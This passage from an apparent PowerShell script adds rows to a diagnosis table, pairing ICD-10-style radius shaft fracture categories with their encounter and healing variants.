fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, left arm","Displaced comminuted fracture of shaft of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, unspecified arm","Displaced comminuted fracture of shaft of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, right arm","Nondisplaced comminuted fracture of shaft of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, left arm","Nondisplaced comminuted fracture of shaft of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of radius, unspecified arm","Nondisplaced comminuted fracture of shaft of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, right arm","Displaced segmental fracture of shaft of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, left arm","Displaced segmental fracture of shaft of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of radius, unspecified arm","Displaced segmental fracture of shaft of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, right arm","Nondisplaced segmental fracture of shaft of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture 